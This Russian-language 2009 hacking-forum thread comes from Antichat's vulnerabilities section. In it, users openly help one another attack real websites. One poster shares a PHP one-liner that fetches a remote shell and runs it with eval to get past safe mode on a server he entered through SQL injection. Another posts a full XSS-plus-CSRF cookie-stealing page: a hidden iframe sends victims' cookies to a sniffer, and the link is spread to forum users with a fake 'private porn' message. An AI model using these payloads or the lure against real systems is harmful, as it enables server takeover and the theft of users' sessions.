ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #4891  
Старый 22.01.2009, 21:22
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

есть такой вопрос... есть скуля.. через нее заливаю в php но тут трабла... до смд так и не добрался...

safe mod on
magic quotes on
http include disabled

как можно обойти это? функции вида system exec passthru include copy move_uploaded_file fopen и тд не пашут! c file_get_contents не разобрался до конца..

помогите +)

Последний раз редактировалось sabe; 22.01.2009 в 21:39..
 

  #4892  
Старый 22.01.2009, 21:48
Qam
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040

Репутация: 15
По умолчанию

Заранее извеняюсь если такой вопрос здесь уже был,но я говорю честно гуглил!!!Вопщем есть на сайте пасивная хсс,могу ли я ее использовать в связке с CSRF?Тоесть я на уязвимом форуме кидаю урл на свой сайт в коде страницы которого ява скрипт суть этого скрипта в том чтобы он браузер жертвы отправлял на скрипт уявимый к хсс со всеми вытикающими!Технически это возможно?Еще раз извеняюсь если подобный вопрос уже был!Если что то не ясно спросил говорите!
 

  #4893  
Старый 22.01.2009, 22:07
Артем Солнце
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729

Репутация: 67
По умолчанию

Цитата:
Сообщение от Qam  
Заранее извеняюсь если такой вопрос здесь уже был,но я говорю честно гуглил!!!Вопщем есть на сайте пасивная хсс,могу ли я ее использовать в связке с CSRF?Тоесть я на уязвимом форуме кидаю урл на свой сайт в коде страницы которого ява скрипт суть этого скрипта в том чтобы он браузер жертвы отправлял на скрипт уявимый к хсс со всеми вытикающими!Технически это возможно?Еще раз извеняюсь если подобный вопрос уже был!Если что то не ясно спросил говорите!
технически возможно, но тебе нужно правильно составить запрос, который будет выполнятся от другого пользователя, при условии конечно если он в тот момент будет авторизован.
 

  #4894  
Старый 22.01.2009, 22:09
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от sabe  
есть такой вопрос... есть скуля.. через нее заливаю в php но тут трабла... до смд так и не добрался...

safe mod on
magic quotes on
http include disabled

как можно обойти это? функции вида system exec passthru include copy move_uploaded_file fopen и тд не пашут! c file_get_contents не разобрался до конца..

помогите +)
тоесть ты свой php код можешь заливать на серв уже?
 

  #4895  
Старый 22.01.2009, 22:26
Qam
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040

Репутация: 15
По умолчанию

Артем Солнце пасиб тебе за помощь!Так будет правильно в коде страниц:
<script>http://site.ru/bag.php?b=адрес_снифа</script>
вроде и все же!Иль вродь напутал!А если применить ни тэги <скрипт> а тэги картинки?Забыл в каких тэгах писать нужно!Подскажите если можете!
 

  #4896  
Старый 22.01.2009, 22:40
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

попугай
да... долго думал.. очень)) вышло все намного проще.. вот поделюсь как я обошел сейф мод в моем случае... правда после заливки и так мало что можно зделать )
Цитата:
<? $f=file_get_contents("http://shell.txt");eval($f);?>
терь другой вопрос... как можно редактировать файл.. при сейфмоде.. нужны команды )
 

  #4897  
Старый 22.01.2009, 22:45
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

sabe

а средствами шелла не редактируется? Прав не хватает?
 

  #4898  
Старый 22.01.2009, 22:54
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

попугай
нет.. все функции отключены... токо eval пашет и ему спасибо)
могу лол токо unlink делать.. пока что остальные отключены сейфом... идеи? сайт того стоит)
 

  #4899  
Старый 22.01.2009, 22:58
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

ого, всмысле fopen, fwrite, file_put_contents - всё это отключено? ващее...

а fputs ?
 

  #4900  
Старый 22.01.2009, 23:02
Артем Солнце
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729

Репутация: 67
По умолчанию

Цитата:
Сообщение от Qam  
Артем Солнце пасиб тебе за помощь!Так будет правильно в коде страниц:
<script>http://site.ru/bag.php?b=адрес_снифа</script>
вроде и все же!Иль вродь напутал!А если применить ни тэги <скрипт> а тэги картинки?Забыл в каких тэгах писать нужно!Подскажите если можете!
ты видимо недопонял, что такое CSRF.
CSRF это межсайтовая имитация запроса пользователя к стороннему сайту, если пользователь в это время авторизован на стороннем сайте. Т.е. если я правильно понял, то ты нашел XSS на форуме, и в связке XSS и CSRF ты можешь сделать следующее:

Допустим http://forum/bug-script.php?tipic=1 это ссылка бажного форума.
Ты нашел там XSS и ссылка с ним выглядит допустим так:
http://forum/bug-script.php?tipic=><script>alert(document.coockie)</script>
Вот. Но это палевный вариант сувать такую ссылку пользователям.
Теперь ты на своем сайте допустим hack2009.narod.ru размещаешь в index.html такой код:
<html>
<title>ERROR</title>
<body>
<b>ERROR</b>
<iframe style="width:0px; height:0px; border: 0px"
src="http://forum/bug-script.php?tipic=><script>КОД_ПЕРЕДАЧИ_ СНИФЕРУ</script>"></iframe>
</body>
</html>
и пишешь на форуме в ЛС любому пользователю, мол "смотри тут преватное порно hack2009.narod.ru". Он переходит из ЛС на твой сайт и там выполняется CSRF+XSS. Куки твои. Молодец. Пять.

p.s. может где-то ошибся просто время уже 3:05 пиши сюда помогу чем могу
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ